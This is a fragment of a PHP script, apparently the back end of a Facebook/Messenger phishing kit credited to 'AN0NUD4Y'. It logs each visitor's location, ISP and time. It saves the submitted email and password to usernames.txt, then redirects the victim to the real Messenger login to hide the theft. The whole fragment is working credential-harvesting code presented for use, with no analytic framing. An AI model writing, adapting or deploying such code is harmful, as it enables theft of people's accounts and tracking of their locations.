loc.' [6]ISP = ' // latitude, longitude .$details->org.' [7]CITY = ' // internet service provider .$details->city.' [8]STATE = ' // city .$details->region.' [9]COUNTRY = ' // state .$details->country.' [10]DATE & TIME = ' // country .date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date ."\n" ; $write = fputs($fileHandle, $string); @ fclose($fileHandle); } $var = $_POST['email']; $var2 = $_POST['pass']; $myFile = file_get_contents("protect.html"); $searchString = "WELCOME TO FACEBOOK"; if($myFile != $searchString) { file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); header('Location: https://messenger.com/login/'); } if($myFile != $searchString) { echo "LOGIN SUCCESSFULL"; header('Location: https://messenger.com/login'); } exit(); ?>